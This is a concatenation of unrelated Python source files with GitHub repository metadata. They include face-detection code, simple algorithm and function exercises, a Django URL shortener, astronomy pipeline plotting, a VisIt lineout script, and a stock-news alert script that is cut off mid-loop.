bounding boxes with scores and offsets (4 + 1 + 4).
"""
sh, sw = img.shape[:2]
width, height = self.width, self.height
threshold = self.detection_threshold[0]
# 將圖像做基礎處理後送入pnet
for transform in self.preprocess_flow:
img = transform(img)
output = self.pnet(expand_dims(to_tensor(img), 0))
probs = output['confidence'][0, 0, :, :]
offsets = output['box']
# 根據全卷積網路輸出結果計算對應候選框座標
boxes = self.generate_bboxes(probs, offsets, scale, threshold)
# 在此尺度的候選框先做一次nms已有效減少候選框數量,這樣後續rnet, onet才不會GPU爆掉。
keep = self.nms(boxes[:, 0:5], overlap_threshold=self.nms_threshold[0])
boxes = boxes[keep].copy()
del output
return boxes
# 根據候選框座標至原圖挖取人臉圖像,已進行後續階段
def get_image_boxes(self, bounding_boxes, size=24):
"""Cut out boxes from the image.
Arguments:
bounding_boxes: a float numpy array of shape [n, 5].
size: an integer, size of cutouts.
Returns:
a float numpy array of shape [n, 3, size, size].
"""
num_boxes = len(bounding_boxes)
height, width = self.image.shape[:2]
# 宣告空白的img_boxes物件用來存放挖取的人臉圖像區域
img_boxes = np.zeros((num_boxes, 3, size, size), "float32")
n = 0
for i in range(num_boxes):
x1, y1, x2, y2 = bounding_boxes[i][:4]
try:
# 根據x1,y1,x2,y2座標,且座標必須大於零且小於等於圖像長寬的原則來挖取人臉區域
yy1 = int(builtins.max(y1, 0))
yy2 = int(builtins.min(y2, self.height))
xx1 = int(builtins.max(x1, 0))
xx2 = int(builtins.min(x2, self.width))
img_box = self.image[yy1:yy2, xx1:xx2, :]
if img_box.shape[0] != img_box.shape[1]:
# 若挖出非正方形則補滿為正方形
max_length = builtins.max(list(img_box.shape[:2]))
new_img_box = np.zeros((max_length, max_length, 3))
new_img_box[0:img_box.shape[0], 0:img_box.shape[1], :] = img_box
img_box = new_img_box
# 將正方形區域縮放後,經過預處理self.preprocess_flow後再塞入img_boxes
img_box = resize((size, size), keep_aspect=True)(img_box)
for transform in self.preprocess_flow:
img_box = transform(img_box)
img_boxes[i, :, :, :] = img_box
n += 1
except:
pass
# 列印一下成功挖取的區域數量(有可能座標本身不合理造成無法成功挖取)
print(n, 'image generated')
return img_boxes
def infer_single_image(self, img, **kwargs):
if self.model.built:
self.model.to(self.device)
self.model.eval()
image, boxes, probs, landmarks = self.detect(img)
return image, to_numpy(boxes), to_numpy(probs).astype(np.int32), to_numpy(landmarks)
def infer_then_draw_single_image(self, img):
start_time = time.time()
rgb_image, boxes, probs, landmark = self.infer_single_image(img)
if boxes is not None and len(boxes) > 0:
boxes = np.round(boxes).astype(np.int32)
if boxes.ndim == 1:
boxes = np.expand_dims(boxes, 0)
print(img, time.time() - start_time)
pillow_img = array2image(rgb_image.copy())
print(boxes, labels, flush=True)
if len(boxes) > 0:
for m in range(len(boxes)):
this_box = boxes[m]
this_label = 1
if int(this_label) > 0:
thiscolor = self.palette[1]
print('face', this_box, probs[m], flush=True)
pillow_img = plot_bbox(this_box, pillow_img, thiscolor, self.class_names[
int(this_label)] if self.class_names is not None else '', line_thickness=2)
rgb_image = np.array(pillow_img.copy())
return rgb_image, boxes, probs, landmark
|
AllanYiin/trident
|
trident/models/pytorch_mtcnn.py
|
pytorch_mtcnn.py
|
py
| 28,973 |
python
|
en
|
code
| 74 |
github-code
|
6
|
2642867267
|
def findPeakElement(nums):
if len(nums) == 1 or nums[0] > nums[1]:
return 0
n = len(nums)
if nums[n - 1] > nums[n - 2]:
return n - 1
# 0th and n - 1 th index already checked
start = 1
end = n - 1
while start <= end:
mid = start + (end - start) // 2
if nums[mid - 1] < nums[mid] > nums[mid + 1]:
return mid
# Find peak on the left
elif nums[mid] < nums[mid - 1]:
end = mid - 1
# Find peak on the right
else:
start = mid + 1
return -1
nums = [1, 2, 1, 3, 5, 6, 4]
print(findPeakElement(nums))
|
ArunRawat404/DSA
|
Binary Seach/1. BS on 1D Arrays/13. Find Peak Element.py
|
13. Find Peak Element.py
|
py
| 633 |
python
|
en
|
code
| 0 |
github-code
|
6
|
40718345835
|
# Assignment - 20 Full Stack Web Development using Python MySirG
#More on functions
# 1. Write a python program to create a function that takes a list and returns a new list
# with the original list's unique elements.
def unique_list(l):
x = []
for a in l:
if a not in x:
x.append(a)
return x
print(unique_list([1,2,3,3,3,3,4,5]))
# 2. Write a python program to create a function that takes a number as a parameter and
# checks if the number is prime or not.
def check_prime(n):
if (n==1):
return False
elif (n==2):
return True
else:
for x in range(2,n):
if(n % x==0):
return False
return True
print(check_prime(11))
# 3. Write a python program to create a function that prints the even numbers from a
# given list.
# Sample List : [1, 2, 3, 4, 5, 6, 7, 8, 9]
def even(l):
l2=[]
for i in l:
if i%2==0:
l2.append(i)
return l2
l = [1, 2, 3, 4, 5, 6, 7, 8, 9]
result=even(l)
print(result)
# 4. Write a python program to create a function that checks whether a passed string is palindrome or not.
def strPalindrome(s,start,end):
while start<=end:
if s[start]==s[end]:
start=start+1
end=end-1
else:
return False
return True
s="nitin"
#s="abcddcba"
#s="mango"
start=0
end=len(s)-1
result=strPalindrome(s,0,end)
print (result)
# 5. Write a python program to create a function to find the Min of three numbers.
def minimum(a, b, c):
if (a <= b) and (a <= c):
smallest = a
elif (b <= a) and (b <= c):
smallest = b
else:
smallest = c
return smallest
a = 10
b = 14
c = 12
print(minimum(a, b, c))
# 6. Write a python program to create a function and print a list where the values are
# square of numbers between 1 and 30.
def fun():
l = list()
for i in range(1,31):
l.append(i**2)
print(l)
fun()
#7. Write a python program to access a function inside a function.
def num1(x):
def num2(y):
return x * y
return num2
res = num1(10)
print(res(5))
# 8. Write a python program to create a function that accepts a string and calculate the
# number of upper case letters and lower case letters.
x=input("Enter the string:- ")
def char(x):
u=0
l=0
for i in x:
if i>='a' and i<='z':
l+=1
if i >='A' and i<='Z':
u+=1
print("LowerCase letter in the String",l)
print("UpperCase letter in the String",u)
char(x)
# 9. Write a python program to create a function to check whether a string is a pangram or not.
# from string import ascii_lowercase as asc_lower
def check(s):
return set(asc_lower) - set(s.lower()) == set([])
strng=input("Enter string:")
if(check(strng)==True):
print("The string is a pangram")
else:
print("The string isn't a pangram")
# 10. Write a python program to create a function to check whether a string is an anagram or not.
def check(s1, s2):
if(sorted(s1)== sorted(s2)):
print("The strings are anagrams.")
else:
print("The strings aren't anagrams.")
s1 ="listen"
s2 ="silent"
check(s1, s2)
|
Bhawna011/Python_Assignments
|
Assignment_20_function(2).py
|
Assignment_20_function(2).py
|
py
| 3,338 |
python
|
en
|
code
| 0 |
github-code
|
6
|
12119046055
|
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
try:
from distutils.command.build_py import build_py_2to3 as build_py
except ImportError:
from distutils.command.build_py import build_py
path, script = os.path.split(sys.argv[0])
os.chdir(os.path.abspath(path))
requests = 'requests >= 2.1.0'
if sys.version_info < (2, 6):
requests += ', < 2.1.0'
install_requires = [requests, "future==0.15.2"]
# Don't import openpay module here, since deps may not be installed
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'openpay'))
from version import VERSION
# Get simplejson if we don't already have json
if sys.version_info < (3, 0):
try:
import json
except ImportError:
install_requires.append('simplejson')
setup(name='openpay',
cmdclass={'build_py': build_py},
version=VERSION,
description='Openpay python bindings',
author='Openpay',
author_email='[email protected]',
url='https://www.openpay.mx/',
tests_require=['mock'],
packages=['openpay', 'openpay.test'],
package_data={'openpay': ['data/ca-certificates.crt', '../VERSION']},
install_requires=install_requires,
test_suite='openpay.test.all',
use_2to3=True,
)
|
open-pay/openpay-python
|
setup.py
|
setup.py
|
py
| 1,312 |
python
|
en
|
code
| 19 |
github-code
|
6
|
11601984964
|
import sqlite3
"""
Two functions to help the main.py functions to validate the reference variable.
"""
# Open the database and create a cursor
conn = sqlite3.connect("candidate.db")
c = conn.cursor()
""" **************************
Args - ref - str
Return - Bool
A validation function that takes the reference as an argument, checks the length is equal to 8 and then
if it is made up of only letters and numbers. If either of these steps fail, a relevant message is sent to the user
explaining why.
**************************"""
def valid_reference(ref):
if len(ref) != 8:
print("Reference must be 8 characters long.")
return False
else:
count = 0
for i in ref:
if (57 >= ord(i) >= 48) or (90 >= ord(i) >= 65) or (122 >= ord(i) >= 97):
count += 1
if count == 8:
return True
else:
print("Reference must be only letters/digits.")
return False
""" **************************
Args - ref - str
Return - either DB row or False
This function takes the reference as an argument and checks the database to see if it exists. If it does it
messages the user and return the record.
If not, then it returns False
**************************"""
def check_reference_exists(ref):
with conn:
c.execute("SELECT * FROM candidate_table WHERE reference=?", (ref,))
candidate_selected = c.fetchone()
if candidate_selected:
print("Reference exists...")
return candidate_selected
return False
|
JohnEHughes/arctic_shores_test_v1
|
validators.py
|
validators.py
|
py
| 1,584 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4461070550
|
# Licensed under a MIT style license - see LICENSE.txt
"""MUSE-PHANGS check pipeline module
"""
__authors__ = "Eric Emsellem"
__copyright__ = "(c) 2017, ESO + CRAL"
__license__ = "MIT License"
__contact__ = " <[email protected]>"
# This module will take a MusePipe object and do the plot check ups
# Standard modules
from os.path import join as joinpath
import glob
__version__ = '0.0.4 (21 Feb 2019)'
# v0.0.4: Debugged a bit more with the new MusePipe structure
# v0.0.3: Debugged a bit the sequence
# v0.0.2: Added some import after moving MuseCube, MuseImage, etc
# v0.0.1: initial
from .graph_pipe import GraphMuse
from .musepipe import MusePipe
from .mpdaf_pipe import MuseCube, MuseSpectrum, MuseSetSpectra
from .mpdaf_pipe import MuseImage, MuseSetImages, get_sky_spectrum
name_final_datacube = "DATACUBE_FINAL.fits"
PLOT = '\033[1;34;20m'
ENDC = '\033[0m'
def print_plot(text):
print(PLOT + "# CheckPipeInfo " + ENDC + text)
class CheckPipe(MusePipe):
"""Checking the outcome of the data reduction
"""
def __init__(self, mycube=name_final_datacube, pdf_name="check_pipe.pdf",
pipe=None, standard_set=True, **kwargs):
"""Init of the CheckPipe class. Using a default datacube to run some checks
and create some plots
"""
if pipe is not None:
self.__dict__.update(pipe.__dict__)
else:
MusePipe.__init__(self, **kwargs)
self.cube = MuseCube(filename=joinpath(self.paths.object, mycube))
self.pdf = GraphMuse(pdf_name=joinpath(self.paths.figures, pdf_name))
# Input parameters useful to define a set of spectra and images
suffix_skyspectra = kwargs.pop("suffix_skyspectra", "")
suffix_images = kwargs.pop("suffix_images", None)
if standard_set:
# getting standard spectra
self.cube.get_set_spectra()
# plotting all standard data
# Page 1
self.check_quadrants()
# plotting the white image and Ha image
# Page 2
self.check_white_line_images(line="Ha")
# plotting the sky spectra
# Page 3
self.check_sky_spectra(suffix_skyspectra)
# Checking some images only if suffix_images is provided
if suffix_images is not None:
self.check_given_images(suffix_images)
# closing the pdf
self.pdf.close()
def check_quadrants(self):
"""Checking spectra from the 4 quadrants
"""
print_plot("Plotting the 4 quadrants-spectra")
self.pdf.plot_page(self.cube.spec_4quad)
def check_master_bias_flat(self):
"""Checking the Master bias and Master flat
"""
bias = self.get_master(mastertype="Bias", scale='arcsinh', title="Master Bias")
flat = self.get_master(mastertype="Flat", scale='arcsing', title="Master Flat")
tocheck = MuseSetImages(bias, flat, subtitle="Master Bias - Master Flat")
print_plot("Plotting the Master Bias and Flat")
self.pdf.plot_page(tocheck)
def check_white_line_images(self, line="Ha", velocity=0.):
"""Building the White and Ha images and
Adding them on the page
"""
white = self.cube.get_whiteimage_from_cube()
linemap = self.cube.get_emissionline_image(line=line, velocity=velocity)
tocheck = MuseSetImages(white, linemap,
subtitle="White and emission line {0} images".format(line))
print_plot("Plotting the White and {0} images".format(line))
self.pdf.plot_page(tocheck)
def check_sky_spectra(self, suffix):
"""Check all sky spectra from the exposures
"""
sky_spectra_names = glob.glob(self.paths.sky +
"./SKY_SPECTRUM_*{suffix}.fits".format(suffix=suffix))
tocheck = MuseSetSpectra(subtitle="Sky Spectra")
counter = 1
for specname in sky_spectra_names:
tocheck.append(MuseSpectrum(source=get_sky_spectrum(specname),
title=f"Sky {counter:2d}", add_sky_lines=True))
counter += 1
print_plot("Plotting the sky spectra")
self.pdf.plot_page(tocheck)
def check_given_images(self, suffix=None):
"""Check all images with given suffix
"""
if suffix is None:
suffix = ""
image_names = glob.glob(self.paths.maps + "./*{0}*.fits".format(suffix))
tocheck = MuseSetImages(subtitle="Given Images - {0}".format(suffix))
counter = 1
for imaname in image_names:
tocheck.append(MuseImage(filename=imaname, title="Image {0:2d}".format(counter)))
counter += 1
print_plot("Plotting the set of given images")
self.pdf.plot_page(tocheck)
|
emsellem/pymusepipe
|
src/pymusepipe/check_pipe.py
|
check_pipe.py
|
py
| 4,869 |
python
|
en
|
code
| 7 |
github-code
|
6
|
36356263355
|
from PIL import ImageDraw
from configs.cfgs import args
def read_class_names(class_file_name):
'''loads class name from a file'''
names = {}
with open(class_file_name, 'r') as data:
for ID, name in enumerate(data):
names[ID] = name.strip('\n')
return names
def draw_boxes(img, boxes):
"""
:param img:
:param boxes:
:return:
"""
draw = ImageDraw.Draw(img)
for box in boxes:
draw.rectangle(list(box), outline='red')
return img
class UnNormalizer(object):
def __init__(self, mean=None, std=None):
if mean == None:
self.mean = [0.485, 0.456, 0.406]
else:
self.mean = mean
if std == None:
self.std = [0.229, 0.224, 0.225]
else:
self.std = std
def __call__(self, tensor):
"""
Args:
tensor (Tensor): Tensor image of size (C, H, W) to be normalized.
Returns:
Tensor: Normalized image.
"""
for t, m, s in zip(tensor, self.mean, self.std):
t.mul_(s).add_(m)
return tensor
def test():
class_name = read_class_names(args.classes)
print(class_name)
if __name__ == "__main__":
test()
|
alexchungio/RetinaNet-Pytorch
|
utils/tools.py
|
tools.py
|
py
| 1,245 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2026787329
|
import csv
import matplotlib.pyplot as plt
Zb = [[], []]
# with open('F:/zhengwangwork/test csv/4.csv','rb')as f:
# reader=csv.reader(f)
# for row in reader:
# print(row[0])
file = open('../gold.csv', 'r', encoding='UTF-8') # 打开csv文件
reader = csv.reader(file) # 读取csv文件
data = list(reader) # 将csv数据转化为列表
length_h = len(data) # 得到数据行数
lenght_l = len(data[0]) # 得到每行长度
x = list()
y = list()
for i in range(0, length_h): # 从第一行开始读取
x.append(data[i][0]) # 将第一列数据从第一行读取到最后一行付给列表x
y.append(data[i][2]) # 将第三列数据从第一行读取到最后一行付给列表y
plt.plot(x, y) # 绘制折线图
plt.show() # 显示折线图
|
Nienter/mypy
|
personal/gold.py
|
gold.py
|
py
| 775 |
python
|
zh
|
code
| 0 |
github-code
|
6
|
34730801336
|
import logging
import json
import os
import requests
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def lambda_handler(inputPayload, context):
slack_link = os.environ['SLACK_URL']
try:
url = inputPayload['issue']['html_url']
except Exception as e:
logger.error(e)
# return a 500 error code
res = json.dumps({'statusCode': 500, 'body': f'Error: {e}'})
return res
reply = {'text': f"Issue Created: {url}"}
res = requests.post(slack_link, json=reply)
return res
|
ByteOfKathy/esep-webhooks
|
lambda_function.py
|
lambda_function.py
|
py
| 536 |
python
|
en
|
code
| 0 |
github-code
|
6
|
44343755795
|
import sys
from itertools import combinations as comb
sys.stdin = open('input/20529.txt')
input = sys.stdin.readline
def d(A, B):
return sum([A[i] != B[i] for i in range(4)])
T = int(input())
for tc in range(T):
N = int(input())
mbti = input().split()
if len(mbti) > 32:
print(0)
else:
ans = 12
for c in set(list(comb(mbti, 3))):
dist = d(c[0], c[1]) + d(c[0], c[2]) + d(c[1], c[2])
ans = min(ans, dist)
print(ans)
|
nayeonkinn/algorithm
|
baekjoon/[S1] 20529. 가장 가까운 세 사람의 심리적 거리.py
|
[S1] 20529. 가장 가까운 세 사람의 심리적 거리.py
|
py
| 493 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29246617685
|
# from django.contrib import messages
from json import loads, dumps
from .models import Link
from django.db.models import Sum
from django.db import OperationalError
from tenacity import (retry, stop_after_attempt, wait_fixed,
retry_if_exception_type)
import random
import string
import datetime
from django.shortcuts import render, redirect, get_object_or_404
from django.http import (HttpResponse, HttpResponseServerError, Http404,
HttpResponseBadRequest)
# For Google Web Crawler to work and website to show up on Google
def robots_txt(request):
lines = [
"User-Agent: *",
"Disallow: /admin/"
# "Disallow: /*"
]
return HttpResponse("\n".join(lines), content_type="text/plain")
# Returning home page
def index(request):
stats = get_stats()
return render(request, 'shortner/index.html', context=stats)
# returns stats for rendering in index.html
def return_last_value(retry_state):
print(f'\n\n attempt number {retry_state.attempt_number} \n \
function for which retry was called: {retry_state.fn} \n\n')
@retry(retry=retry_if_exception_type(OperationalError),
stop=stop_after_attempt(3),
wait=wait_fixed(0.75),
retry_error_callback=return_last_value)
def get_stats():
# generating date information
d1 = datetime.datetime(2020, 8, 30)
d2 = datetime.datetime.now()
time_difference = d2-d1
months = round(time_difference.days / 30)
stats = {
'total_links': Link.objects.all().count(),
'total_clicks':
Link.objects.aggregate(total_clicks=Sum('clicks'))['total_clicks'],
'active_months': months
}
return stats
def check(request, shortlink):
if linkExists(shortlink):
return HttpResponse(dumps({'link': shortlink, 'available': False}))
else:
return HttpResponse(dumps({'link': shortlink, 'available': True}))
# not strictly required but might be useful for debugging
print('nothing got returned')
def create(request):
# assump1: post body exists
# assump2: post body has 'longlink' defined
if request.method != 'POST':
return redirect('/')
reqBody = loads(request.body)
longlink = reqBody['longlink']
shortlink = '' # temporary empty value
try:
shortlink = reqBody['shortlink']
if shortlink == '':
# ik it's wrong...sorry.
raise KeyError('Empty shortlink')
if linkExists(shortlink):
res = HttpResponseBadRequest()
res.reason_phrase = 'Shortlink already taken'
res.status_code = 400
return res
except KeyError:
shortlink = getShortRandomLink(5)
obj = Link(shortlink=shortlink, longlink=longlink)
obj.save()
return HttpResponse(dumps(obj.getDict()))
@retry(retry=retry_if_exception_type(OperationalError),
stop=stop_after_attempt(3),
wait=wait_fixed(0.75),
retry_error_callback=return_last_value)
def rediretor(request, shortlink):
shortlinkObj = get_object_or_404(Link, pk=shortlink)
# uncomment below lines when adding feature
shortlinkObj.clicks += 1
shortlinkObj.save()
return redirect(shortlinkObj.longlink)
def custom_404(request, exception):
return render(request, 'shortner/404.html', status=404)
def linkExists(shortlink):
try:
Link.objects.get(pk=shortlink)
return True
except Link.DoesNotExist:
return False
# ------- helper functions ---------
def getShortRandomLink(length):
temp = get_random_string(length)
if linkExists(temp):
# recursion!
getShortRandomLink(length)
return temp
def get_random_string(length):
letters = string.ascii_lowercase
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str
# function to tell user how many clicks their link have gotten
# usable as api/clicky/<shortlink>
def clicks(request, shortlink):
# print(f"shortlink of cliks is {shortlink}\n")
if linkExists(shortlink):
link = Link.objects.get(pk=shortlink)
return HttpResponse(link.clicks)
else:
return HttpResponse('0')
|
RahulTandon1/cutshort
|
shortner/views.py
|
views.py
|
py
| 4,216 |
python
|
en
|
code
| 3 |
github-code
|
6
|
15183195346
|
#! usr/bin/env python
# -*- coding : utf-8 -*-
from skopt import gp_maximize
import numpy as np
from skopt.plots import plot_convergence
np.random.seed(123)
#%matplotlib inline
import matplotlib.pyplot as plt
noise_level = 0.1
def f(x, noise_level=noise_level):
return np.sin(5 * x[0]) * (1 - np.tanh(x[0] ** 2)) + np.random.randn() * noise_level
# Plot f(x) + contours
x = np.linspace(-2, 2, 400).reshape(-1, 1)
fx = [f(x_i, noise_level=0.0) for x_i in x]
plt.plot(x, fx, "r--", label="True (unknown)")
plt.fill(np.concatenate([x, x[::-1]]),
np.concatenate(([fx_i - 1.9600 * noise_level for fx_i in fx],
[fx_i + 1.9600 * noise_level for fx_i in fx[::-1]])),
alpha=.2, fc="r", ec="None")
#plt.legend()
#plt.grid()
#plt.show()
res = gp_maximize(f, # the function to minimize
[(-2.0, 2.0)], # the bounds on each dimension of x
acq_func="EI", # the acquisition function
n_calls=15, # the number of evaluations of f
n_random_starts=5, # the number of random initialization points
noise=0.1**2, # the noise level (optional)
random_state=123) # the random seed
#print(res)
#plot_convergence(res);
plt.rcParams["figure.figsize"] = (6, 4)
# Plot f(x) + contours
x = np.linspace(-2, 2, 400).reshape(-1, 1)
x_gp = res.space.transform(x.tolist())
fx = [f(x_i, noise_level=0.0) for x_i in x]
plt.plot(x, fx, "r--", label="True (unknown)")
plt.fill(np.concatenate([x, x[::-1]]),
np.concatenate(([fx_i - 1.9600 * noise_level for fx_i in fx],
[fx_i + 1.9600 * noise_level for fx_i in fx[::-1]])),
alpha=.2, fc="r", ec="None")
# Plot GP(x) + contours
gp = res.models[-1]
y_pred, sigma = gp.predict(x_gp, return_std=True)
plt.plot(x, y_pred, "g--", label=r"$\mu_{GP}(x)$")
plt.fill(np.concatenate([x, x[::-1]]),
np.concatenate([y_pred - 1.9600 * sigma,
(y_pred + 1.9600 * sigma)[::-1]]),
alpha=.2, fc="g", ec="None")
# Plot sampled points
plt.plot(res.x_iters,
res.func_vals,
"r.", markersize=15, label="Observations")
plt.title(r"$x^* = %.4f, f(x^*) = %.4f$" % (res.x[0], res.fun))
plt.legend(loc="best", prop={'size': 8}, numpoints=1)
plt.grid()
plt.show()
|
aggarwalpiush/Hyperparameter-Optimization-Tutorial
|
main.py
|
main.py
|
py
| 2,364 |
python
|
en
|
code
| 3 |
github-code
|
6
|
25231399833
|
#! /usr/bin/env python
# encoding: utf-8
# vim: ai ts=4 sts=4 et sw=4
##
##
## @author Nadia
## [email protected]/[email protected]
##
from coreapp.appmodel.models import CrecheParent, CrecheChild, PARENT_CHILD_RELATION
from coreapp.service.base_service import BaseService
from coreapp.service.child_service import ChildService, GENDER, CHILD_CLASSES
from coreapp.exception.critical_error import CriticalError
from django.db.models import Q, Max
from django.utils.datetime_safe import datetime
class ParentService(BaseService):
def __init__(self):
BaseService.__init__(self)
def list(self, params):
sortLimitParams = self.setSortLimitParameters(params)
filterObj = Q()
if params.get('searchName'):
filterObj = filterObj & Q(names__icontains=params.get('searchName'))
if params.get('searchParentId'):
filterObj = filterObj & Q(id=params.get('searchCParentId'))
if params.get('searchDateCreated'):
filterObj = filterObj & Q(
date_created__gte=datetime.strptime(params.get('searchDateCreated') + ' 00:00:59',
'%Y-%m-%d %H:%M:%S'))
filterObj = filterObj & Q(
date_created__lte=datetime.strptime(params.get('searchDateCreated') + ' 23:59:59',
'%Y-%m-%d %H:%M:%S'))
if params.get('searchTelephone'):
filterObj = filterObj & Q(telephone = params.get('searchTelephone'))
if params.get('searchIDNO'):
filterObj = filterObj & Q(identity_document = params.get('searchIDNO'))
if params.get('searchEmail'):
filterObj = filterObj & Q(email = params.get('searchEmail'))
result = CrecheParent.objects.filter(filterObj).order_by(sortLimitParams['dir'] + sortLimitParams['sort'])[
sortLimitParams['start']: sortLimitParams['limit']]
count = CrecheParent.objects.filter(filterObj).count()
records = []
for item in result:
record = {}
record['id'] = item.id
record['telephone'] = item.telephone.encode('utf-8')
record['id_number'] = item.identity_document.encode('utf-8')
record['date_created'] = item.date_created.isoformat()
record['children'] = [ {"names": ch.names, "regno": ch.regno, "id": ch.id} for ch in item.children.all()]
record['address'] = item.full_address.encode('utf-8')
record['email'] = item.email.encode('utf-8')
record['names'] = item.names
record['relationship'] = item.relationship.encode('utf-8')
records.append(record)
return {'totalCount': count, 'records': records}
def listExport(self, params):
"""Export the applicant data"""
records = self.list(params)
return self.decodeDataToExport(records, params.get('exportColumns'))
def save_parent(self, postValues):
"""
we assume we will not register a child without a parent, and a parent without a child
:param postValues:
:return:
"""
parent = None
params = postValues.copy()
if params.get('parent_names'):
try:
parent = CrecheParent.objects.get(id = params.get('id_number'))
parent.names = params.get('parent_names')
parent.telephone = params.get('telephone')
parent.identity_number = params.get('id_number')
parent.relationship = params.get('relationship')
parent.full_address = params.get('full_address')
parent.email = params.get('email'),
parent.last_updated = datetime.now()
except CrecheParent.DoesNotExist:
parent = CrecheParent( names = params.get('parent_names'),
telephone = params.get('telephone'),
identity_number = params.get('id_number'),
relationship=params.get('relationship'),
full_address=params.get('full_address'),
email=params.get('email'),
date_created=datetime.now(),
last_updated = datetime.now()
)
try:
parent.save()
except Exception:
raise CriticalError({'message': "Unkwon Error while saving parent '" + params.get("parent_names") + "'. Try again or contact system admin "})
return parent
def save_parent_child(self, postValues):
"""
we assume we will not register a child without a parent, and a parent without a child
:param postValues:
:return:
"""
parent = None
child = None
params = postValues.copy()
if params.get('parent_names'):
try:
parent = CrecheParent.objects.get(id = params.get('id_number'))
parent.names = params.get('parent_names')
parent.telephone = params.get('telephone')
parent.identity_document = params.get('id_number')
parent.relationship = params.get('relationship')
parent.full_address = params.get('full_address')
parent.email = params.get('email'),
parent.last_updated = datetime.now()
except CrecheParent.DoesNotExist:
parent = CrecheParent( names = params.get('parent_names'),
telephone = params.get('telephone'),
identity_document = params.get('id_number'),
relationship=params.get('relationship'),
full_address=params.get('full_address'),
email=params.get('email'),
date_created=datetime.now(),
last_updated = datetime.now()
)
try:
child_service = ChildService()
child = child_service.save_child(postValues)
print("CHILD : ", child.__dict__)
if child:
parent.save()
parent.children.add(child)
#parent.save()
else:
raise CriticalError({'message': "The child '" + params.get(
'child_names') + "' of parent '" + params.get("parent_names") + "' was not saved. Try again "})
except Exception as e:
try:
child.delete()
parent.delete()
except Exception as ex:
print("ERROR ROLLING BACK", ex)
print("PARENT CHILD ERROR ", e)
raise CriticalError({'message': "Unkwon Error while saving child '" + params.get(
'child_names') + "' of parent '" + params.get("parent_names") + "'. Try again or contact system admin "})
return parent, child
def add_child(self, parentObj, child_id = None, regno = None):
if child_id:
parentObj.children.add(CrecheChild.objects.get(id= child_id))
if regno:
parentObj.children.add(CrecheChild.objects.get(regno=regno))
parentObj.save()
return parentObj
|
projet2019/Creche_Parentale
|
creche/coreapp/service/parent_service.py
|
parent_service.py
|
py
| 7,616 |
python
|
en
|
code
| 0 |
github-code
|
6
|
75127728507
|
# This script gets the data of a lineout for different components
begin_file = 0
end_file = 20
file_step = 20
plt_prefix = "name_of_your_hdf5_files"
path_to_hdf5_files = "path_to_hdf5s"
# Choose components
components = ["phi", "lapse", "chi"]
# specify a begin and end point for the lineout, e.g. two (x,y) points if you sliced normal to z
[x_min, y_min, z_min] = [0, 0, 0]
[x_max, y_max, z_max] = [3000, 0, 0]
def rendering():
def lineout(name):
AddPlot("Curve", "operators/Lineout/" + name, 1, 1)
LineoutAtts = LineoutAttributes()
LineoutAtts.point1 = (x_min, y_min, z_min)
LineoutAtts.point2 = (x_max, y_max, z_max)
SetOperatorOptions(LineoutAtts, 1)
def window_options(name):
SaveWindowAtts = SaveWindowAttributes()
SaveWindowAtts.outputToCurrentDirectory = 1
SaveWindowAtts.fileName = name + "_"
SaveWindowAtts.family = 1
SaveWindowAtts.format = SaveWindowAtts.CURVE # BMP, CURVE, JPEG, OBJ, PNG, POSTSCRIPT, POVRAY, PPM, RGB, STL, TIFF, ULTRA, VTK, PLY
SetSaveWindowAttributes(SaveWindowAtts)
# Evolve reading next hdf5 files
for i in range(begin_file ,end_file ,file_step):
hdf5filename = plt_prefix + "%06i.3d.hdf5"%i
print("Analysing file " + hdf5filename)
OpenDatabase(path_to_hdf5_files + hdf5filename)
for name in components:
window_options(name)
lineout(name)
DrawPlots()
SaveWindow()
DeleteAllPlots()
print("Component: " + name)
CloseDatabase(path_to_hdf5_files + hdf5filename)
if __visit_script_file__ == __visit_source_file__:
rendering()
os.remove("./visitlog.py")
|
GRChombo/Postprocessing_tools
|
VisItTools/LineoutTools/CurveLineout.py
|
CurveLineout.py
|
py
| 1,839 |
python
|
en
|
code
| 1 |
github-code
|
6
|
35509709603
|
def sum_even_odd_digits(number):
ch = 0
nch = 0
position = 1
while number > 0:
digit = number % 10
if position % 2 == 0:
ch += digit
else:
nch += digit
number //= 10
position += 1
return ch, nch
number = int(input())
ch, nch = sum_even_odd_digits(number)
result=nch+ch*3
if (result%10==0):
print("yes")
else:
print("no")
|
aas1565/Python
|
buns/mod2_1/task13_new.py
|
task13_new.py
|
py
| 417 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2872283986
|
import requests
import datetime as dt
from twilio.rest import Client
account_sid = 'Twilio_api_sid'
auth_token = 'twilio_auth_token'
STOCK = "TSLA"
COMPANY_NAME = "Tesla Inc"
stock_api_key = 'alpha_vantage_api_key'
news_api_key = 'news_api_key'
STOCK_ENDPOINT = "https://www.alphavantage.co/query"
NEWS_ENDPOINT = "https://newsapi.org/v2/everything"
today = dt.datetime.now().date()
lag_1day = str(today - dt.timedelta(days=1))
lag_2day = str(today - dt.timedelta(days=2))
up_down = ''
percent_change = 0
stock_parameters = {
'function': 'TIME_SERIES_DAILY_ADJUSTED',
'symbol': STOCK,
'outputsize': 'compact',
'apikey': stock_api_key,
'pageSize': 3,
'page': 1,
}
news_parameters = {
'q': COMPANY_NAME,
'from': lag_2day,
'to': lag_1day,
'sortBy': 'publishedAt',
'apiKey': news_api_key,
}
# Make api request to stock api
stock_response = requests.get(STOCK_ENDPOINT, params=stock_parameters)
stock_response.raise_for_status()
stock_data = stock_response.json()
# Get closing price
try:
lag_1day_close = float(stock_data['Time Series (Daily)'][lag_1day]['4. close'])
except KeyError:
lag_1day_close = None
try:
lag_2day_close = float(stock_data['Time Series (Daily)'][lag_2day]['4. close'])
except KeyError:
lag_2day_close = None
# Find percent change, and set up_down symbol
if lag_1day_close is not None and lag_2day_close is not None:
difference = lag_1day_close - lag_2day_close
percent_change = round((difference / lag_1day_close) * 100)
if difference < 0:
up_down = '🔻'
else:
up_down = '🔺'
# Make api request to get news articles
news_response = requests.get(NEWS_ENDPOINT, params=news_parameters)
news_response.raise_for_status()
news_data = news_response.json()
top_news = news_data['articles'][:3]
news_title_list = [top_news[_]['title'] for _ in range(len(top_news))]
news_description_list = [top_news[_]['description'] for _ in range(len(top_news))]
# Send text messages
if percent_change >= 5 or percent_change <= -5:
for i in range(len(news_title_list)):
